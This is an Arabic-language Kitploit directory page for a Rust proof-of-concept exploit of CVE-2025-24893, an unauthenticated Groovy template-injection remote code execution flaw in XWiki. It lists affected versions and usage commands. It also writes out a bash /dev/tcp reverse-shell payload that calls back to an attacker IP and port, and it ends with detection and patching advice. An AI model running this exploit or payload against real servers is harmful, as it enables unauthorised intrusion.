Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-24893-poc — أداة إثبات مفهوم (PoC) لاستغلال الثغرة CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) غير موثقة في XWiki. تستغل عيب حقن قالب في نقطة نهاية SolrSearch عبر تنفيذ سكريبت Groovy. | Kitploit
أدوات/GitHubGitHub/investigato/cve-2025-24893-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubinvestigato/cve-2025-24893-poc

cve-2025-24893-poc

أداة إثبات مفهوم (PoC) لاستغلال الثغرة CVE-2025-24893، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) غير موثقة في XWiki. تستغل عيب حقن قالب في نقطة نهاية SolrSearch عبر تنفيذ سكريبت Groovy.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-24893 — XWiki ثغرة تنفيذ تعليمات برمجية عن بُعد بدون مصادقة (PoC)

إثبات المفهوم (PoC) لثغرة CVE-2025-24893، وهي ثغرة حرجة لـ تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في XWiki.
يستغل هذا الإكسبلويت حقن قالب Groovy في نقطة النهاية SolrSearch لتنفيذ أوامر عشوائية — بما في ذلك الصدف العكسية — دون الحاجة إلى مصادقة.

💥 تفاصيل الثغرة

يسمح خلل في معالجة XWiki للمدخلات المُعدّة خصيصًا لنقطة النهاية SolrSearch RSS للمهاجمين بحقن كود Groovy في مسار العرض.
مما يتيح تنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر كتل النص البرمجي {{groovy}}.

✅ الإصدارات المتأثرة

  • < 15.10.11
  • >= 16.0.0 و < 16.4.1

❌ تم الإصلاح في

  • 15.10.11
  • 16.4.1

🔧 الاستخدام

حمِّل الإصدار:

الإصدارات

أو ابنِ من المصدر:

root@kitploit:~
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444

حمولة الصدفة العكسية

توجد حمولة صدفة عكسية معدة مسبقًا بهذا الشكل:

bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1


⚠️ إخلاء مسؤولية قانوني

هذا الكود مخصص للبحث الأمني التعليمي والمصرح به فقط.
لا تستخدم هذا الإكسبلويت ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


✍️ الإسناد

  • إثبات المفهوم (PoC) من Artemir7
  • نسخة Rust من investigato

🛡️ الاكتشاف والتخفيف

  • التحديث إلى XWiki 15.10.11 أو 16.4.1+
  • راقب الاستخدام المشبوه لـ /bin/get/Main/SolrSearch?media=rss
  • عطّل تنفيذ Groovy للمستخدمين المجهولين إن أمكن
تنزيل الأداة